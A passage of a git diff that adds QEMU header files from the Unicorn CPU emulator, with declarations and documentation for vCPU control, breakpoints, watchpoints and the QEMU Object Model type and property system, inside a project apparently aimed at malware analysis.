@cpu: The vCPU to check. 
+ * + * Checks whether the CPU has work to do. + * + * Returns: %true if the CPU has work, %false otherwise. + */ +static inline bool cpu_has_work(CPUState *cpu) +{ + CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + g_assert(cc->has_work); + return cc->has_work(cpu); +} + +/** + * qemu_cpu_kick: + * @cpu: The vCPU to kick. + * + * Kicks @cpu's thread. + */ +void qemu_cpu_kick(CPUState *cpu); + +/** + * cpu_is_stopped: + * @cpu: The CPU to check. + * + * Checks whether the CPU is stopped. + * + * Returns: %true if run state is not running or if artificially stopped; + * %false otherwise. + */ +bool cpu_is_stopped(CPUState *cpu); + +/** + * run_on_cpu: + * @cpu: The vCPU to run on. + * @func: The function to be executed. + * @data: Data to pass to the function. + * + * Schedules the function @func for execution on the vCPU @cpu. + */ +void run_on_cpu(CPUState *cpu, void (*func)(void *data), void *data); + +/** + * async_run_on_cpu: + * @cpu: The vCPU to run on. + * @func: The function to be executed. + * @data: Data to pass to the function. + * + * Schedules the function @func for execution on the vCPU @cpu asynchronously. + */ +void async_run_on_cpu(CPUState *cpu, void (*func)(void *data), void *data); + +/** + * qemu_get_cpu: + * @index: The CPUState@cpu_index value of the CPU to obtain. + * + * Gets a CPU matching @index. + * + * Returns: The CPU or %NULL if there is no matching CPU. + */ +CPUState *qemu_get_cpu(struct uc_struct *uc, int index); + +/** + * cpu_exists: + * @id: Guest-exposed CPU ID to lookup. + * + * Search for CPU with specified ID. + * + * Returns: %true - CPU is found, %false - CPU isn't found. + */ +bool cpu_exists(struct uc_struct* uc, int64_t id); + +#ifndef CONFIG_USER_ONLY + +typedef void (*CPUInterruptHandler)(CPUState *, int); + +extern CPUInterruptHandler cpu_interrupt_handler; + +/** + * cpu_interrupt: + * @cpu: The CPU to set an interrupt on. + * @mask: The interupts to set. + * + * Invokes the interrupt handler. 
+ */ +static inline void cpu_interrupt(CPUState *cpu, int mask) +{ + cpu_interrupt_handler(cpu, mask); +} + +#else /* USER_ONLY */ + +void cpu_interrupt(CPUState *cpu, int mask); + +#endif /* USER_ONLY */ + +#ifdef CONFIG_SOFTMMU +static inline void cpu_unassigned_access(CPUState *cpu, hwaddr addr, + bool is_write, bool is_exec, + int opaque, unsigned size) +{ + CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + if (cc->do_unassigned_access) { + cc->do_unassigned_access(cpu, addr, is_write, is_exec, opaque, size); + } +} + +static inline void cpu_unaligned_access(CPUState *cpu, vaddr addr, + int is_write, int is_user, + uintptr_t retaddr) +{ + CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + cc->do_unaligned_access(cpu, addr, is_write, is_user, retaddr); +} +#endif + +/** + * cpu_reset_interrupt: + * @cpu: The CPU to clear the interrupt on. + * @mask: The interrupt mask to clear. + * + * Resets interrupts on the vCPU @cpu. + */ +void cpu_reset_interrupt(CPUState *cpu, int mask); + +/** + * cpu_exit: + * @cpu: The CPU to exit. + * + * Requests the CPU @cpu to exit execution. + */ +void cpu_exit(CPUState *cpu); + +/** + * cpu_resume: + * @cpu: The CPU to resume. + * + * Resumes CPU, i.e. puts CPU into runnable state. + */ +void cpu_resume(CPUState *cpu); + +/** + * qemu_init_vcpu: + * @cpu: The vCPU to initialize. + * + * Initializes a vCPU. + */ +int qemu_init_vcpu(CPUState *cpu); + +#define SSTEP_ENABLE 0x1 /* Enable simulated HW single stepping */ +#define SSTEP_NOIRQ 0x2 /* Do not use IRQ while single stepping */ +#define SSTEP_NOTIMER 0x4 /* Do not Timers while single stepping */ + +/** + * cpu_single_step: + * @cpu: CPU to the flags for. + * @enabled: Flags to enable. + * + * Enables or disables single-stepping for @cpu. 
+ */ +void cpu_single_step(CPUState *cpu, int enabled); + +/* Breakpoint/watchpoint flags */ +#define BP_MEM_READ 0x01 +#define BP_MEM_WRITE 0x02 +#define BP_MEM_ACCESS (BP_MEM_READ | BP_MEM_WRITE) +#define BP_STOP_BEFORE_ACCESS 0x04 +/* 0x08 currently unused */ +#define BP_GDB 0x10 +#define BP_CPU 0x20 +#define BP_WATCHPOINT_HIT_READ 0x40 +#define BP_WATCHPOINT_HIT_WRITE 0x80 +#define BP_WATCHPOINT_HIT (BP_WATCHPOINT_HIT_READ | BP_WATCHPOINT_HIT_WRITE) + +int cpu_breakpoint_insert(CPUState *cpu, vaddr pc, int flags, + CPUBreakpoint **breakpoint); +int cpu_breakpoint_remove(CPUState *cpu, vaddr pc, int flags); +void cpu_breakpoint_remove_by_ref(CPUState *cpu, CPUBreakpoint *breakpoint); +void cpu_breakpoint_remove_all(CPUState *cpu, int mask); + +int cpu_watchpoint_insert(CPUState *cpu, vaddr addr, vaddr len, + int flags, CPUWatchpoint **watchpoint); +int cpu_watchpoint_remove(CPUState *cpu, vaddr addr, + vaddr len, int flags); +void cpu_watchpoint_remove_by_ref(CPUState *cpu, CPUWatchpoint *watchpoint); +void cpu_watchpoint_remove_all(CPUState *cpu, int mask); + +void QEMU_NORETURN cpu_abort(CPUState *cpu, const char *fmt, ...) + GCC_FMT_ATTR(2, 3); + +void cpu_register_types(struct uc_struct *uc); + +#ifdef CONFIG_SOFTMMU +extern const struct VMStateDescription vmstate_cpu_common; +#else +#define vmstate_cpu_common vmstate_dummy +#endif + +#define VMSTATE_CPU() { \ + .name = "parent_obj", \ + .size = sizeof(CPUState), \ + .vmsd = &vmstate_cpu_common, \ + .flags = VMS_STRUCT, \ + .offset = 0, \ +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/object.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/object.h new file mode 100644 index 0000000..c3a1ffe --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/object.h @@ -0,0 +1,1270 @@ +/* + * QEMU Object Model + * + * Copyright IBM, Corp. 
2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + * + */ + +#ifndef QEMU_OBJECT_H +#define QEMU_OBJECT_H + +#include "glib_compat.h" +#include "unicorn/platform.h" +#include "qemu/queue.h" +#include "qapi/error.h" + +struct Visitor; + +struct TypeImpl; +typedef struct TypeImpl *Type; + +typedef struct ObjectClass ObjectClass; +typedef struct Object Object; + +typedef struct TypeInfo TypeInfo; + +typedef struct InterfaceClass InterfaceClass; +typedef struct InterfaceInfo InterfaceInfo; + +struct uc_struct; + +#define TYPE_OBJECT "object" + +/** + * SECTION:object.h + * @title:Base Object Type System + * @short_description: interfaces for creating new types and objects + * + * The QEMU Object Model provides a framework for registering user creatable + * types and instantiating objects from those types. QOM provides the following + * features: + * + * - System for dynamically registering types + * - Support for single-inheritance of types + * - Multiple inheritance of stateless interfaces + * + * <example> + * <title>Creating a minimal type + * + * #include "qdev.h" + * + * #define TYPE_MY_DEVICE "my-device" + * + * // No new virtual functions: we can reuse the typedef for the + * // superclass. + * typedef DeviceClass MyDeviceClass; + * typedef struct MyDevice + * { + * DeviceState parent; + * + * int reg0, reg1, reg2; + * } MyDevice; + * + * static const TypeInfo my_device_info = { + * .name = TYPE_MY_DEVICE, + * .parent = TYPE_DEVICE, + * .instance_size = sizeof(MyDevice), + * }; + * + * static void my_device_register_types(void) + * { + * type_register_static(&my_device_info); + * } + * + * type_init(my_device_register_types) + * + * + * + * In the above example, we create a simple type that is described by #TypeInfo. 
+ * #TypeInfo describes information about the type including what it inherits + * from, the instance and class size, and constructor/destructor hooks. + * + * Every type has an #ObjectClass associated with it. #ObjectClass derivatives + * are instantiated dynamically but there is only ever one instance for any + * given type. The #ObjectClass typically holds a table of function pointers + * for the virtual methods implemented by this type. + * + * Using object_new(), a new #Object derivative will be instantiated. You can + * cast an #Object to a subclass (or base-class) type using + * object_dynamic_cast(). You typically want to define macro wrappers around + * OBJECT_CHECK() and OBJECT_CLASS_CHECK() to make it easier to convert to a + * specific type: + * + * + * Typecasting macros + * + * #define MY_DEVICE_GET_CLASS(obj) \ + * OBJECT_GET_CLASS(MyDeviceClass, obj, TYPE_MY_DEVICE) + * #define MY_DEVICE_CLASS(klass) \ + * OBJECT_CLASS_CHECK(MyDeviceClass, klass, TYPE_MY_DEVICE) + * #define MY_DEVICE(obj) \ + * OBJECT_CHECK(MyDevice, obj, TYPE_MY_DEVICE) + * + * + * + * # Class Initialization # + * + * Before an object is initialized, the class for the object must be + * initialized. There is only one class object for all instance objects + * that is created lazily. + * + * Classes are initialized by first initializing any parent classes (if + * necessary). After the parent class object has initialized, it will be + * copied into the current class object and any additional storage in the + * class object is zero filled. + * + * The effect of this is that classes automatically inherit any virtual + * function pointers that the parent class has already initialized. All + * other fields will be zero filled. + * + * Once all of the parent classes have been initialized, #TypeInfo::class_init + * is called to let the class being instantiated provide default initialize for + * its virtual functions. 
Here is how the above example might be modified + * to introduce an overridden virtual function: + * + * + * Overriding a virtual function + * + * #include "qdev.h" + * + * void my_device_class_init(ObjectClass *klass, void *class_data) + * { + * DeviceClass *dc = DEVICE_CLASS(klass); + * dc->reset = my_device_reset; + * } + * + * static const TypeInfo my_device_info = { + * .name = TYPE_MY_DEVICE, + * .parent = TYPE_DEVICE, + * .instance_size = sizeof(MyDevice), + * .class_init = my_device_class_init, + * }; + * + * + * + * Introducing new virtual methods requires a class to define its own + * struct and to add a .class_size member to the #TypeInfo. Each method + * will also have a wrapper function to call it easily: + * + * + * Defining an abstract class + * + * #include "qdev.h" + * + * typedef struct MyDeviceClass + * { + * DeviceClass parent; + * + * void (*frobnicate) (MyDevice *obj); + * } MyDeviceClass; + * + * static const TypeInfo my_device_info = { + * .name = TYPE_MY_DEVICE, + * .parent = TYPE_DEVICE, + * .instance_size = sizeof(MyDevice), + * .abstract = true, // or set a default in my_device_class_init + * .class_size = sizeof(MyDeviceClass), + * }; + * + * void my_device_frobnicate(MyDevice *obj) + * { + * MyDeviceClass *klass = MY_DEVICE_GET_CLASS(obj); + * + * klass->frobnicate(obj); + * } + * + * + * + * # Interfaces # + * + * Interfaces allow a limited form of multiple inheritance. Instances are + * similar to normal types except for the fact that are only defined by + * their classes and never carry any state. You can dynamically cast an object + * to one of its #Interface types and vice versa. + * + * # Methods # + * + * A method is a function within the namespace scope of + * a class. It usually operates on the object instance by passing it as a + * strongly-typed first argument. + * If it does not operate on an object instance, it is dubbed + * class method. + * + * Methods cannot be overloaded. 
That is, the #ObjectClass and method name
+ * uniquely identify the function to be called; the signature does not vary
+ * except for trailing varargs.
+ *
+ * Methods are always virtual. Overriding a method in
+ * #TypeInfo.class_init of a subclass leads to any user of the class obtained
+ * via OBJECT_GET_CLASS() accessing the overridden function.
+ * The original function is not automatically invoked. It is the responsibility
+ * of the overriding class to determine whether and when to invoke the method
+ * being overridden.
+ *
+ * To invoke the method being overridden, the preferred solution is to store
+ * the original value in the overriding class before overriding the method.
+ * This corresponds to |[ {super,base}.method(...) ]| in Java and C#
+ * respectively; this frees the overriding class from hardcoding its parent
+ * class, which someone might choose to change at some point.
+ *
+ *
+ * Overriding a virtual method
+ *
+ * typedef struct MyState MyState;
+ *
+ * typedef void (*MyDoSomething)(MyState *obj);
+ *
+ * typedef struct MyClass {
+ * ObjectClass parent_class;
+ *
+ * MyDoSomething do_something;
+ * } MyClass;
+ *
+ * static void my_do_something(MyState *obj)
+ * {
+ * // do something
+ * }
+ *
+ * static void my_class_init(ObjectClass *oc, void *data)
+ * {
+ * MyClass *mc = MY_CLASS(oc);
+ *
+ * mc->do_something = my_do_something;
+ * }
+ *
+ * static const TypeInfo my_type_info = {
+ * .name = TYPE_MY,
+ * .parent = TYPE_OBJECT,
+ * .instance_size = sizeof(MyState),
+ * .class_size = sizeof(MyClass),
+ * .class_init = my_class_init,
+ * };
+ *
+ * typedef struct DerivedClass {
+ * MyClass parent_class;
+ *
+ * MyDoSomething parent_do_something;
+ * } DerivedClass;
+ *
+ * static void derived_do_something(MyState *obj)
+ * {
+ * DerivedClass *dc = DERIVED_GET_CLASS(obj);
+ *
+ * // do something here
+ * dc->parent_do_something(obj);
+ * // do something else here
+ * }
+ *
+ * static void derived_class_init(ObjectClass *oc, void *data)
+ * {
+ * MyClass *mc = MY_CLASS(oc);
+ * DerivedClass *dc = DERIVED_CLASS(oc);
+ *
+ * dc->parent_do_something = mc->do_something;
+ * mc->do_something = derived_do_something;
+ * }
+ *
+ * static const TypeInfo derived_type_info = {
+ * .name = TYPE_DERIVED,
+ * .parent = TYPE_MY,
+ * .class_size = sizeof(DerivedClass),
+ * .class_init = derived_class_init,
+ * };
+ *
+ *
+ * Alternatively, object_class_by_name() can be used to obtain the class and
+ * its non-overridden methods for a specific type. This would correspond to
+ * |[ MyClass::method(...) ]| in C++.
+ *
+ * The first example of such a QOM method was #CPUClass.reset,
+ * another example is #DeviceClass.realize.
+ */
+
+
+/**
+ * ObjectPropertyAccessor:
+ * @obj: the object that owns the property
+ * @v: the visitor that contains the property data
+ * @opaque: the object property opaque
+ * @name: the name of the property
+ * @errp: a pointer to an Error that is filled if getting/setting fails.
+ *
+ * Called when trying to get/set a property.
+ */
+typedef void (ObjectPropertyAccessor)(struct uc_struct *uc, Object *obj,
+ struct Visitor *v,
+ void *opaque,
+ const char *name,
+ Error **errp);
+typedef int (ObjectPropertySetAccessor)(struct uc_struct *uc, Object *obj,
+ struct Visitor *v,
+ void *opaque,
+ const char *name,
+ Error **errp);
+
+/**
+ * ObjectPropertyResolve:
+ * @obj: the object that owns the property
+ * @opaque: the opaque registered with the property
+ * @part: the name of the property
+ *
+ * Resolves the #Object corresponding to property @part.
+ *
+ * The returned object can also be used as a starting point
+ * to resolve a relative path starting with "@part".
+ *
+ * Returns: If @path is the path that led to @obj, the function
+ * returns the #Object corresponding to "@path/@part".
+ * If "@path/@part" is not a valid object path, it returns #NULL.
+ */ +typedef Object *(ObjectPropertyResolve)(struct uc_struct *uc, Object *obj, + void *opaque, + const char *part); + +/** + * ObjectPropertyRelease: + * @obj: the object that owns the property + * @name: the name of the property + * @opaque: the opaque registered with the property + * + * Called when a property is removed from a object. + */ +typedef void (ObjectPropertyRelease)(struct uc_struct *uc, Object *obj, + const char *name, + void *opaque); + +typedef struct ObjectProperty +{ + gchar *name; + gchar *type; + gchar *description; + ObjectPropertyAccessor *get; + ObjectPropertySetAccessor *set; + ObjectPropertyResolve *resolve; + ObjectPropertyRelease *release; + void *opaque; + + QTAILQ_ENTRY(ObjectProperty) node; +} ObjectProperty; + +/** + * ObjectUnparent: + * @obj: the object that is being removed from the composition tree + * + * Called when an object is being removed from the QOM composition tree. + * The function should remove any backlinks from children objects to @obj. + */ +typedef void (ObjectUnparent)(struct uc_struct *uc, Object *obj); + +/** + * ObjectFree: + * @obj: the object being freed + * + * Called when an object's last reference is removed. + */ +typedef void (ObjectFree)(void *obj); + +#define OBJECT_CLASS_CAST_CACHE 4 + +/** + * ObjectClass: + * + * The base for all classes. The only thing that #ObjectClass contains is an + * integer type handle. + */ +struct ObjectClass +{ + /*< private >*/ + Type type; + GSList *interfaces; + + const char *object_cast_cache[OBJECT_CLASS_CAST_CACHE]; + const char *class_cast_cache[OBJECT_CLASS_CAST_CACHE]; + + ObjectUnparent *unparent; +}; + +/** + * Object: + * + * The base for all objects. The first member of this object is a pointer to + * a #ObjectClass. Since C guarantees that the first member of a structure + * always begins at byte 0 of that structure, as long as any sub-object places + * its parent as the first member, we can cast directly to a #Object. 
+ * + * As a result, #Object contains a reference to the objects type as its + * first member. This allows identification of the real type of the object at + * run time. + * + * #Object also contains a list of #Interfaces that this object + * implements. + */ +struct Object +{ + /*< private >*/ + ObjectClass *class_; + ObjectFree *free; + QTAILQ_HEAD(, ObjectProperty) properties; + uint32_t ref; + Object *parent; +}; + +/** + * TypeInfo: + * @name: The name of the type. + * @parent: The name of the parent type. + * @instance_size: The size of the object (derivative of #Object). If + * @instance_size is 0, then the size of the object will be the size of the + * parent object. + * @instance_init: This function is called to initialize an object. The parent + * class will have already been initialized so the type is only responsible + * for initializing its own members. + * @instance_post_init: This function is called to finish initialization of + * an object, after all @instance_init functions were called. + * @instance_finalize: This function is called during object destruction. This + * is called before the parent @instance_finalize function has been called. + * An object should only free the members that are unique to its type in this + * function. + * @abstract: If this field is true, then the class is considered abstract and + * cannot be directly instantiated. + * @class_size: The size of the class object (derivative of #ObjectClass) + * for this object. If @class_size is 0, then the size of the class will be + * assumed to be the size of the parent class. This allows a type to avoid + * implementing an explicit class type if they are not adding additional + * virtual functions. + * @class_init: This function is called after all parent class initialization + * has occurred to allow a class to set its default virtual method pointers. + * This is also the function to use to override virtual methods from a parent + * class. 
+ * @class_base_init: This function is called for all base classes after all + * parent class initialization has occurred, but before the class itself + * is initialized. This is the function to use to undo the effects of + * memcpy from the parent class to the descendents. + * @class_finalize: This function is called during class destruction and is + * meant to release and dynamic parameters allocated by @class_init. + * @class_data: Data to pass to the @class_init, @class_base_init and + * @class_finalize functions. This can be useful when building dynamic + * classes. + * @interfaces: The list of interfaces associated with this type. This + * should point to a static array that's terminated with a zero filled + * element. + */ +struct TypeInfo +{ + const char *name; + const char *parent; + + size_t class_size; + size_t instance_size; + void *instance_userdata; + + void (*instance_init)(struct uc_struct *uc, Object *obj, void *opaque); + void (*instance_post_init)(struct uc_struct *uc, Object *obj); + void (*instance_finalize)(struct uc_struct *uc, Object *obj, void *opaque); + + void *class_data; + + void (*class_init)(struct uc_struct *uc, ObjectClass *klass, void *data); + void (*class_base_init)(ObjectClass *klass, void *data); + void (*class_finalize)(ObjectClass *klass, void *data); + + bool abstract; + + void *parent_type; + ObjectClass *class_; + + InterfaceInfo *interfaces; +}; + +/** + * OBJECT: + * @obj: A derivative of #Object + * + * Converts an object to a #Object. Since all objects are #Objects, + * this function will always succeed. + */ +#define OBJECT(obj) \ + ((Object *)(obj)) + +/** + * OBJECT_CLASS: + * @class: A derivative of #ObjectClass. + * + * Converts a class to an #ObjectClass. Since all objects are #Objects, + * this function will always succeed. + */ +#define OBJECT_CLASS(class) \ + ((ObjectClass *)(class)) + +/** + * OBJECT_CHECK: + * @type: The C type to use for the return value. + * @obj: A derivative of @type to cast. 
+ * @name: The QOM typename of @type + * + * A type safe version of @object_dynamic_cast_assert. Typically each class + * will define a macro based on this type to perform type safe dynamic_casts to + * this object type. + * + * If an invalid object is passed to this function, a run time assert will be + * generated. + */ +#define OBJECT_CHECK(uc, type, obj, name) \ + ((type *)object_dynamic_cast_assert(uc, OBJECT(obj), (name), \ + __FILE__, __LINE__, __func__)) + +/** + * OBJECT_CLASS_CHECK: + * @class: The C type to use for the return value. + * @obj: A derivative of @type to cast. + * @name: the QOM typename of @class. + * + * A type safe version of @object_class_dynamic_cast_assert. This macro is + * typically wrapped by each type to perform type safe casts of a class to a + * specific class type. + */ +#define OBJECT_CLASS_CHECK(uc, class, obj, name) \ + ((class *)object_class_dynamic_cast_assert(uc, OBJECT_CLASS(obj), (name), \ + __FILE__, __LINE__, __func__)) + +/** + * OBJECT_GET_CLASS: + * @class: The C type to use for the return value. + * @obj: The object to obtain the class for. + * @name: The QOM typename of @obj. + * + * This function will return a specific class for a given object. Its generally + * used by each type to provide a type safe macro to get a specific class type + * from an object. + */ +#define OBJECT_GET_CLASS(uc, class, obj, name) \ + OBJECT_CLASS_CHECK(uc, class, object_get_class(OBJECT(obj)), name) + +/** + * InterfaceInfo: + * @type: The name of the interface. + * + * The information associated with an interface. + */ +struct InterfaceInfo { + const char *type; +}; + +/** + * InterfaceClass: + * @parent_class: the base class + * + * The class for all interfaces. Subclasses of this class should only add + * virtual methods. 
+ */ +struct InterfaceClass +{ + ObjectClass parent_class; + /*< private >*/ + ObjectClass *concrete_class; + Type interface_type; +}; + +#define TYPE_INTERFACE "interface" + +/** + * INTERFACE_CLASS: + * @klass: class to cast from + * Returns: An #InterfaceClass or raise an error if cast is invalid + */ +#define INTERFACE_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, InterfaceClass, klass, TYPE_INTERFACE) + +/** + * INTERFACE_CHECK: + * @interface: the type to return + * @obj: the object to convert to an interface + * @name: the interface type name + * + * Returns: @obj casted to @interface if cast is valid, otherwise raise error. + */ +#define INTERFACE_CHECK(uc, interface, obj, name) \ + ((interface *)object_dynamic_cast_assert(uc, OBJECT((obj)), (name), \ + __FILE__, __LINE__, __func__)) + +/** + * object_new: + * @typename: The name of the type of the object to instantiate. + * + * This function will initialize a new object using heap allocated memory. + * The returned object has a reference count of 1, and will be freed when + * the last reference is dropped. + * + * Returns: The newly allocated and instantiated object. + */ +Object *object_new(struct uc_struct *, const char *typename_); + +/** + * object_initialize: + * @obj: A pointer to the memory to be used for the object. + * @size: The maximum size available at @obj for the object. + * @typename: The name of the type of the object to instantiate. + * + * This function will initialize an object. The memory for the object should + * have already been allocated. The returned object has a reference count of 1, + * and will be finalized when the last reference is dropped. + */ +void object_initialize(struct uc_struct *uc, void *obj, size_t size, const char *typename_); + +/** + * object_dynamic_cast: + * @obj: The object to cast. + * @typename: The @typename to cast to. + * + * This function will determine if @obj is-a @typename. @obj can refer to an + * object or an interface associated with an object. 
+ * + * Returns: This function returns @obj on success or #NULL on failure. + */ +Object *object_dynamic_cast(struct uc_struct *uc, Object *obj, const char *typename_); + +/** + * object_dynamic_cast_assert: + * + * See object_dynamic_cast() for a description of the parameters of this + * function. The only difference in behavior is that this function asserts + * instead of returning #NULL on failure if QOM cast debugging is enabled. + * This function is not meant to be called directly, but only through + * the wrapper macro OBJECT_CHECK. + */ +Object *object_dynamic_cast_assert(struct uc_struct *uc, Object *obj, const char *typename_, + const char *file, int line, const char *func); + +/** + * object_get_class: + * @obj: A derivative of #Object + * + * Returns: The #ObjectClass of the type associated with @obj. + */ +ObjectClass *object_get_class(Object *obj); + +/** + * object_get_typename: + * @obj: A derivative of #Object. + * + * Returns: The QOM typename of @obj. + */ +const char *object_get_typename(Object *obj); + +/** + * type_register_static: + * @info: The #TypeInfo of the new type. + * + * @info and all of the strings it points to should exist for the life time + * that the type is registered. + * + * Returns: 0 on failure, the new #Type on success. + */ +Type type_register_static(struct uc_struct *uc, const TypeInfo *info); + +/** + * type_register: + * @info: The #TypeInfo of the new type + * + * Unlike type_register_static(), this call does not require @info or its + * string members to continue to exist after the call returns. + * + * Returns: 0 on failure, the new #Type on success. + */ +Type type_register(struct uc_struct *uc, const TypeInfo *info); + +/** + * object_class_dynamic_cast_assert: + * @klass: The #ObjectClass to attempt to cast. + * @typename: The QOM typename of the class to cast to. + * + * See object_class_dynamic_cast() for a description of the parameters + * of this function. 
The only difference in behavior is that this function + * asserts instead of returning #NULL on failure if QOM cast debugging is + * enabled. This function is not meant to be called directly, but only through + * the wrapper macros OBJECT_CLASS_CHECK and INTERFACE_CHECK. + */ +ObjectClass *object_class_dynamic_cast_assert(struct uc_struct *uc, ObjectClass *klass, + const char *typename_, + const char *file, int line, + const char *func); + +/** + * object_class_dynamic_cast: + * @klass: The #ObjectClass to attempt to cast. + * @typename: The QOM typename of the class to cast to. + * + * Returns: If @typename is a class, this function returns @klass if + * @typename is a subtype of @klass, else returns #NULL. + * + * If @typename is an interface, this function returns the interface + * definition for @klass if @klass implements it unambiguously; #NULL + * is returned if @klass does not implement the interface or if multiple + * classes or interfaces on the hierarchy leading to @klass implement + * it. (FIXME: perhaps this can be detected at type definition time?) + */ +ObjectClass *object_class_dynamic_cast(struct uc_struct *uc, ObjectClass *klass, + const char *typename_); + +/** + * object_class_get_parent: + * @klass: The class to obtain the parent for. + * + * Returns: The parent for @klass or %NULL if none. + */ +ObjectClass *object_class_get_parent(struct uc_struct *uc, ObjectClass *klass); + +/** + * object_class_get_name: + * @klass: The class to obtain the QOM typename for. + * + * Returns: The QOM typename for @klass. + */ +const char *object_class_get_name(ObjectClass *klass); + +/** + * object_class_is_abstract: + * @klass: The class to obtain the abstractness for. + * + * Returns: %true if @klass is abstract, %false otherwise. + */ +bool object_class_is_abstract(ObjectClass *klass); + +/** + * object_class_by_name: + * @typename: The QOM typename to obtain the class for. + * + * Returns: The class for @typename or %NULL if not found. 
+ */
+ObjectClass *object_class_by_name(struct uc_struct *uc, const char *typename_);
+
+void object_class_foreach(struct uc_struct *uc, void (*fn)(ObjectClass *klass, void *opaque),
+ const char *implements_type, bool include_abstract,
+ void *opaque);
+
+/**
+ * object_class_get_list:
+ * @implements_type: The type to filter for, including its derivatives.
+ * @include_abstract: Whether to include abstract classes.
+ *
+ * Returns: A singly-linked list of the classes in reverse hashtable order.
+ */
+GSList *object_class_get_list(struct uc_struct *uc, const char *implements_type,
+ bool include_abstract);
+
+/**
+ * object_ref:
+ * @obj: the object
+ *
+ * Increase the reference count of an object. An object cannot be freed as long
+ * as its reference count is greater than zero.
+ */
+void object_ref(Object *obj);
+
+/**
+ * object_unref:
+ * @obj: the object
+ *
+ * Decrease the reference count of an object. An object cannot be freed as long
+ * as its reference count is greater than zero.
+ */
+void object_unref(struct uc_struct *uc, Object *obj);
+
+/**
+ * object_property_add:
+ * @obj: the object to add a property to
+ * @name: the name of the property. This can contain any character except for
+ * a forward slash. In general, you should use hyphens '-' instead of
+ * underscores '_' when naming properties.
+ * @type: the type name of the property. This namespace is pretty loosely
+ * defined. Sub namespaces are constructed by using a prefix and then
+ * to angle brackets. For instance, the type 'virtio-net-pci' in the
+ * 'link' namespace would be 'link<virtio-net-pci>'.
+ * @get: The getter to be called to read a property. If this is NULL, then
+ * the property cannot be read.
+ * @set: the setter to be called to write a property. If this is NULL,
+ * then the property cannot be written.
+ * @release: called when the property is removed from the object. This is
+ * meant to allow a property to free its opaque upon object
+ * destruction. This may be NULL.
+ * @opaque: an opaque pointer to pass to the callbacks for the property + * @errp: returns an error if this function fails + * + * Returns: The #ObjectProperty; this can be used to set the @resolve + * callback for child and link properties. + */ +ObjectProperty *object_property_add(Object *obj, const char *name, + const char *type, + ObjectPropertyAccessor *get, + ObjectPropertySetAccessor *set, + ObjectPropertyRelease *release, + void *opaque, Error **errp); + +void object_property_del(struct uc_struct *uc, Object *obj, const char *name, Error **errp); + +void object_property_del_child(struct uc_struct *uc, Object *obj, Object *child, Error **errp); + +/** + * object_property_find: + * @obj: the object + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Look up a property for an object and return its #ObjectProperty if found. + */ +ObjectProperty *object_property_find(Object *obj, const char *name, + Error **errp); + +void object_unparent(struct uc_struct *uc, Object *obj); + +/** + * object_property_get: + * @obj: the object + * @v: the visitor that will receive the property value. This should be an + * Output visitor and the data will be written with @name as the name. + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Reads a property from a object. + */ +void object_property_get(struct uc_struct *uc, Object *obj, struct Visitor *v, const char *name, + Error **errp); + +/** + * object_property_set_str: + * @value: the value to be written to the property + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Writes a string value to a property. 
+ */ +void object_property_set_str(struct uc_struct *uc, Object *obj, const char *value, + const char *name, Error **errp); + +/** + * object_property_get_str: + * @obj: the object + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Returns: the value of the property, converted to a C string, or NULL if + * an error occurs (including when the property value is not a string). + * The caller should free the string. + */ +char *object_property_get_str(struct uc_struct *uc, Object *obj, const char *name, + Error **errp); + +/** + * object_property_set_link: + * @value: the value to be written to the property + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Writes an object's canonical path to a property. + */ +void object_property_set_link(struct uc_struct *uc, Object *obj, Object *value, + const char *name, Error **errp); + +/** + * object_property_get_link: + * @obj: the object + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Returns: the value of the property, resolved from a path to an Object, + * or NULL if an error occurs (including when the property value is not a + * string or not a valid object path). + */ +Object *object_property_get_link(struct uc_struct *uc, Object *obj, const char *name, + Error **errp); + +/** + * object_property_set_bool: + * @value: the value to be written to the property + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Writes a bool value to a property. + */ +void object_property_set_bool(struct uc_struct *uc, Object *obj, bool value, + const char *name, Error **errp); + +/** + * object_property_get_bool: + * @obj: the object + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Returns: the value of the property, converted to a boolean, or NULL if + * an error occurs (including when the property value is not a bool). 
+ */ +bool object_property_get_bool(struct uc_struct *uc, Object *obj, const char *name, + Error **errp); + +/** + * object_property_set_int: + * @value: the value to be written to the property + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Writes an integer value to a property. + */ +void object_property_set_int(struct uc_struct *uc, Object *obj, int64_t value, + const char *name, Error **errp); + +/** + * object_property_get_int: + * @obj: the object + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Returns: the value of the property, converted to an integer, or NULL if + * an error occurs (including when the property value is not an integer). + */ +int64_t object_property_get_int(struct uc_struct *uc, Object *obj, const char *name, + Error **errp); + +/** + * object_property_set: + * @obj: the object + * @v: the visitor that will be used to write the property value. This should + * be an Input visitor and the data will be first read with @name as the + * name and then written as the property value. + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Writes a property to a object. + */ +void object_property_set(struct uc_struct *uc, Object *obj, struct Visitor *v, const char *name, + Error **errp); + +/** + * object_property_parse: + * @obj: the object + * @string: the string that will be used to parse the property value. + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Parses a string and writes the result into a property of an object. + */ +void object_property_parse(struct uc_struct *uc, Object *obj, const char *string, + const char *name, Error **errp); + +/** + * object_property_get_type: + * @obj: the object + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Returns: The type name of the property. 
